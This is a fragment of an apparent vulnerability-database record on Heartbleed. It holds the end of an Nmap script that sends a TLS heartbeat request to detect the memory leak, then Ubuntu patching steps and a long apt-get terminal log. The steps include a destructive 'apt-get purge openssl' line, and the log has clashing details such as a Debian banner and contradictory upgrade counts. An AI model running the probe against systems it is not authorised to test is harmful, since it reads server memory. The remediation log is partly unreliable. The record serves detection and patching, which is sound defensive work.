\"handshake\" then\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n if body.extensions and body.extensions[\"heartbeat\"] == \"\\x01\" then\n supported = true\n end\n elseif body.type == \"server_hello_done\" then\n stdnse.debug1(\"we're done!\")\n done = true\n end\n end\n end\n until done\n if not supported then\n stdnse.debug1(\"Server does not support TLS Heartbeat Requests.\")\n s:close()\n return nil\n end\n\n status, err = s:send(hb)\n if not status then\n stdnse.debug1(\"Couldn't send 
heartbeat request: %s\", err)\n s:close()\n return nil\n end\n while(true) do\n local status, typ, ver, len = recvhdr(s)\n if not status then\n stdnse.debug1('No heartbeat response received, server likely not vulnerable')\n break\n end\n if typ == 24 then\n local pay\n status, pay = recvmsg(s, 0x0fe9)\n s:close()\n if #pay > 3 then\n return true\n else\n stdnse.debug1('Server processed malformed heartbeat, but did not return any extra data.')\n break\n end\n elseif typ == 21 then\n stdnse.debug1('Server returned error, likely not vulnerable')\n break\n end\n end\n\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nOpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n ]],\n\n references = {\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',\n 'http://www.openssl.org/news/secadv_20140407.txt ',\n 'http://cvedetails.com/cve/2014-0160/'\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local test_vers = arg_protocols\n\n if type(test_vers) == 'string' then\n test_vers = { test_vers }\n end\n\n for _, ver in ipairs(test_vers) do\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. 
ver\n end\n local status = testversion(host, port, ver)\n if ( status ) then\n vuln_table.state = vulns.STATE.VULN\n break\n end\n end\n\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "description": "", "edition": 4, "published": "2014-04-09T00:00:00", "title": "HeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu", "type": "vulnerlab", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "VULNERLAB:1254", "href": "http://www.vulnerability-lab.com/get_content.php?id=1254", "sourceData": "Document Title:\r\n===============\r\nHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2014-04-09\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1254\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nHow to Fix the HeartBleed SSL Vulnerability (CVE-2014-0160) in Ubuntu with 10 easy steps!\r\n\r\n1. First we login via terminal console to the ssh port (22)\r\n2. Now, we use sudo or su to auth to work with root privileges\r\n3. After the privileges upgrade to root we type `apt-get update` to update all installed core packages\r\n4. Next command is `apt-get upgrade` to upgrade the already installed linux software packages\r\n5. Now, we reboot the system with the following basic command `sudo reboot`\r\n6. After the startup we access the server again via ssh client to port 22\r\n7. We install the development package and upgrade the library itself via the following terminal command `sudo apt-get install openssl libssl-dev`\r\n7. 
As the next command we type `openssl version` (1.0.1) in the command line to review the newest installed version and package name; because the distribution backports the fix, the upstream version string can still read 1.0.1 after patching, so compare the package revision as well (the log below shows 1.0.1-4ubuntu5.11 being replaced by 1.0.1-4ubuntu5.12)\r\n9. The following 2 commands show all affected services that need to be restarted `ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE `/libssl.so.* (deleted)` {} ; | cut -d/ -f3 | sort -u)`\r\nor still running `ls -l /proc/*/fd | grep ssl.*(deleted)`\r\n10. Last step is to reboot by usage of the basic `sudo reboot` to ensure the updates and upgrades were successful\r\n\r\n\r\n\r\nMay delete or overwrite important existing data\r\napt-get purge openssl\r\n\r\nClean the system automatically\r\napt-get autoremove && apt-get autoclean\r\n\r\nDownload and compile the newest version of openssl\r\nwget https://www.openssl.org/source/openssl-1.0.1g.tar.gz\r\n\r\nInspect what is causing an error to pin - Old Repository & Co.\r\napt-cache policy openssl libssl-dev\r\n\r\nNote: Remember that after a compromise a verified certificate needs to be revoked and a new one generated, with a new private key, because the leaked memory may have included the old key.\r\n\r\n\r\n------------- Reboot\r\nanalyst-updater@h2072833:~#\r\nlogin as: analyst-updater\r\nanalyst-updater@h2072833.ben-kenobi-server.net\\'s password:\r\nWelcome to Debian 12.04.4 (GNU/Linux x86_64)\r\nLast login: Wed Apr 9 12:00:55 2014 from xxx.dip0.ipconnect.com\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\n\r\nanalyst-updater@h2072833:~# apt-get update\r\nHit ftp://ftp.ben-kenobi-server.net precise Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Sources\r\nHit 
ftp://ftp.ben-kenobi-server.net precise/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse TranslationIndex\r\nHit 
ftp://ftp.ben-kenobi-server.net precise-updates/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe TranslationIndex\r\nGet:1 ftp://ftp.ben-kenobi-server.net precise/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-de\r\nGet:2 ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-de\r\nGet:3 ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net 
precise/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-de\r\nGet:4 ftp://ftp.ben-kenobi-server.net precise/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-de\r\nGet:5 ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-de\r\nGet:6 ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-de\r\nGet:7 ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-de\r\nGet:8 ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-de\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Translation-en\r\nFetched 368 kB in 0s (808 kB/s)\r\nReading package lists... Done\r\n\r\nanalyst-updater@h2072833:~# apt-get upgrade\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... 
Done\r\n0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nAfter this operation, 0 B of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\n apache2 apache2-mpm-prefork apache2-prefork-dev apache2-utils apache2.2-bin\r\n apache2.2-common ca-certificates clamav clamav-base clamav-freshclam file\r\n icedtea-6-jre-cacao icedtea-6-jre-jamvm ifupdown initramfs-tools\r\n initramfs-tools-bin libapache2-mod-php5 libclamav6 libgtk-3-0 libgtk-3-bin\r\n libgtk-3-common libgudev-1.0-0 libgudev-1.0-0:i386 libmagic1 libnss3\r\n libnss3:i386 libnss3-1d libpq-dev libpq5 librsvg2-2:i386\r\n librsvg2-common:i386 libssl-dev libssl-doc libssl1.0.0 libssl1.0.0:i386\r\n libudev0 libudev0:i386 linux-firmware openjdk-6-jre-headless\r\n openjdk-6-jre-lib openssh-client openssh-server openssl php5 php5-cgi\r\n php5-cli php5-common php5-curl php5-gd php5-mysql php5-sqlite php5-xsl\r\n postgresql-9.1 postgresql-client-9.1 sudo tzdata tzdata-java udev udisks\r\n59 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nNeed to get 108 MB of archives.\r\nAfter this operation, 4,201 kB of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\nGet:1 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d oc all 1.0.1-4ubuntu5.12 [1,032 kB]\r\nGet:2 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d ev amd64 1.0.1-4ubuntu5.12 [1,575 kB]\r\nGet:3 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 i386 1.0.1-4ubuntu5.12 [1,009 kB]\r\nGet:4 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 
0.0 amd64 1.0.1-4ubuntu5.12 [1,048 kB]\r\nGet:5 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 i386 175-0ubuntu9.5 [32.1 kB]\r\nGet:6 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 amd64 175-0ubuntu9.5 [28.4 kB]\r\nGet:7 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -bin amd64 3.4.2-0ubuntu0.7 [15.9 kB]\r\nGet:8 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -0 amd64 3.4.2-0ubuntu0.7 [2,285 kB]\r\nGet:9 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -common all 3.4.2-0ubuntu0.7 [145 kB]\r\nGet:10 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 i386 1:175-0ubuntu9.5 [14.6 kB]\r\nGet:11 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 amd64 1:175-0ubuntu9.5 [14.5 kB]\r\nGet:12 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 -1d amd64 3.15.4-0ubuntu0.12.04.2 [13.4 kB]\r\nGet:13 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 i386 3.15.4-0ubuntu0.12.04.2 [1,292 kB]\r\nGet:14 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 amd64 3.15.4-0ubuntu0.12.04.2 [1,229 kB]\r\nGet:15 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-common i386 2.36.1-0ubuntu1.1 [20.3 kB]\r\nGet:16 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-2 i386 2.36.1-0ubuntu1.1 [109 kB]\r\nGet:17 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main file am d64 5.09-2ubuntu0.3 [19.7 kB]\r\nGet:18 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libmagi c1 amd64 5.09-2ubuntu0.3 [217 kB]\r\nGet:19 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata- java all 2014a-0ubuntu0.12.04 [126 kB]\r\nGet:20 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ 
precise-updates/main tzdata all 2014a-0ubuntu0.12.04 [448 kB]\r\nGet:21 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cg i amd64 5.3.10-1ubuntu3.11 [6,104 kB]\r\nGet:22 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssl amd64 1.0.1-4ubuntu5.12 [523 kB]\r\nGet:23 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -prefork-dev amd64 2.2.22-1ubuntu1.5 [138 kB]\r\nGet:24 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 amd64 2.2.22-1ubuntu1.5 [1,494 B]\r\nGet:25 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -mpm-prefork amd64 2.2.22-1ubuntu1.5 [2,400 B]\r\nGet:26 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-common amd64 2.2.22-1ubuntu1.5 [226 kB]\r\nGet:27 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-bin amd64 2.2.22-1ubuntu1.5 [1,339 kB]\r\nGet:28 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -utils amd64 2.2.22-1ubuntu1.5 [91.3 kB]\r\nGet:29 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libapac he2-mod-php5 amd64 5.3.10-1ubuntu3.11 [3,137 kB]\r\nGet:30 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-my sql amd64 5.3.10-1ubuntu3.11 [76.6 kB]\r\nGet:31 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-xs l amd64 5.3.10-1ubuntu3.11 [14.0 kB]\r\nGet:32 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cu rl amd64 5.3.10-1ubuntu3.11 [28.0 kB]\r\nGet:33 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-gd amd64 5.3.10-1ubuntu3.11 [38.8 kB]\r\nGet:34 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cl i amd64 5.3.10-1ubuntu3.11 [3,051 kB]\r\nGet:35 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-sq lite amd64 5.3.10-1ubuntu3.11 [27.6 
kB]\r\nGet:36 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-co mmon amd64 5.3.10-1ubuntu3.11 [1,797 kB]\r\nGet:37 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-cacao amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [776 kB]\r\nGet:38 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-lib all 6b30-1.13.1-1ubuntu2~0.12.04.3 [6,211 kB]\r\nGet:39 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-jamvm amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [527 kB]\r\nGet:40 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-headless amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [32.8 MB]\r\nGet:41 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main sudo amd64 1.8.3p1-1ubuntu3.6 [299 kB]\r\nGet:42 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ifupdown amd64 0.7~beta2ubuntu11 [48.4 kB]\r\nGet:43 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools all 0.99ubuntu13.5 [49.0 kB]\r\nGet:44 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools-bin amd64 0.99ubuntu13.5 [9,782 B]\r\nGet:45 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udev amd64 175-0ubuntu9.5 [314 kB]\r\nGet:46 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ca-certificates all 20130906ubuntu0.12.04.1 [192 kB]\r\nGet:47 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-server amd64 1:5.9p1-5ubuntu1.3 [338 kB]\r\nGet:48 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-client amd64 1:5.9p1-5ubuntu1.3 [943 kB]\r\nGet:49 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libclamav6 amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [4,208 kB]\r\nGet:50 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-base all 
0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [106 kB]\r\nGet:51 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-freshclam amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [120 kB]\r\nGet:52 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [140 kB]\r\nGet:53 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq-dev amd64 9.1.13-0ubuntu0.12.04 [215 kB]\r\nGet:54 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq5 amd64 9.1.13-0ubuntu0.12.04 [93.0 kB]\r\nGet:55 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main linux-firmware all 1.79.11 [27.7 MB]\r\nGet:56 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5 all 5.3.10-1ubuntu3.11 [1,076 B]\r\nGet:57 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-9.1 amd64 9.1.13-0ubuntu0.12.04 [4,307 kB]\r\nGet:58 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-client-9.1 amd64 9.1.13-0ubuntu0.12.04 [959 kB]\r\nGet:59 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udisks amd64 1.0.4-5ubuntu2.2 [250 kB]\r\nFetched 108 MB in 26s (4,140 kB/s)\r\nExtract templates from packages: 100%\r\nPreconfiguring packages ...\r\n(Reading database ... 
159313 files and directories currently installed.)\r\nPreparing to replace libssl-doc 1.0.1-4ubuntu5.11 (using .../libssl-doc_1.0.1-4ubuntu5.12_all.deb) ...\r\nUnpacking replacement libssl-doc ...\r\nPreparing to replace libssl-dev 1.0.1-4ubuntu5.11 (using .../libssl-dev_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement libssl-dev ...\r\nPreparing to replace libssl1.0.0 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nDe-configuring libssl1.0.0:i386 ...\r\nUnpacking replacement libssl1.0.0 ...\r\nPreparing to replace libssl1.0.0:i386 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_i386.deb) ...\r\nUnpacking replacement libssl1.0.0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up libssl1.0.0 (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl1.0.0:i386 (1.0.1-4ubuntu5.12) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libudev0:i386 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libudev0 ...\r\nUnpacking replacement libudev0:i386 ...\r\nPreparing to replace libudev0 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libudev0 ...\r\nSetting up libudev0:i386 (175-0ubuntu9.5) ...\r\nSetting up libudev0 (175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 
159313 files and directories currently installed.)\r\nPreparing to replace libgtk-3-bin 3.4.2-0ubuntu0.6 (using .../libgtk-3-bin_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nLeaving \\'diversion of /usr/sbin/update-icon-caches to /usr/sbin/update-icon-caches.gtk2 by libgtk-3-bin\\'\r\nLeaving \\'diversion of /usr/share/man/man8/update-icon-caches.8.gz to /usr/share/man/man8/update-icon-caches.gtk2.8.gz by libgtk-3-bin\\'\r\nUnpacking replacement libgtk-3-bin ...\r\nPreparing to replace libgtk-3-0 3.4.2-0ubuntu0.6 (using .../libgtk-3-0_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nUnpacking replacement libgtk-3-0 ...\r\nPreparing to replace libgtk-3-common 3.4.2-0ubuntu0.6 (using .../libgtk-3-common_3.4.2-0ubuntu0.7_all.deb) ...\r\nUnpacking replacement libgtk-3-common ...\r\nPreparing to replace libgudev-1.0-0:i386 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libgudev-1.0-0 ...\r\nUnpacking replacement libgudev-1.0-0:i386 ...\r\nPreparing to replace libgudev-1.0-0 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libgudev-1.0-0 ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for libglib2.0-0 ...\r\nProcessing triggers for libglib2.0-0:i386 ...\r\nSetting up libgudev-1.0-0:i386 (1:175-0ubuntu9.5) ...\r\nSetting up libgudev-1.0-0 (1:175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 
159313 files and directories currently installed.)\r\nPreparing to replace libnss3-1d 3.15.4-0ubuntu0.12.04.1 (using .../libnss3-1d_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3-1d ...\r\nPreparing to replace libnss3:i386 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_i386.deb) ...\r\nDe-configuring libnss3 ...\r\nUnpacking replacement libnss3:i386 ...\r\nPreparing to replace libnss3 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3 ...\r\nSetting up libnss3:i386 (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up libnss3 (3.15.4-0ubuntu0.12.04.2) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace librsvg2-common:i386 2.36.1-0ubuntu1 (using .../librsvg2-common_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-common:i386 ...\r\nPreparing to replace librsvg2-2:i386 2.36.1-0ubuntu1 (using .../librsvg2-2_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-2:i386 ...\r\nPreparing to replace file 5.09-2ubuntu0.2 (using .../file_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement file ...\r\nPreparing to replace libmagic1 5.09-2ubuntu0.2 (using .../libmagic1_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement libmagic1 ...\r\nPreparing to replace tzdata-java 2013g-0ubuntu0.12.04 (using .../tzdata-java_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata-java ...\r\nPreparing to replace tzdata 2013g-0ubuntu0.12.04 (using .../tzdata_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata ...\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up tzdata (2014a-0ubuntu0.12.04) ...\r\n\r\nCurrent default time zone: \\'Etc/GMT\\'\r\nLocal time is now: Wed Apr 9 12:04:24 GMT 2014.\r\nUniversal Time is now: Wed Apr 9 12:04:24 
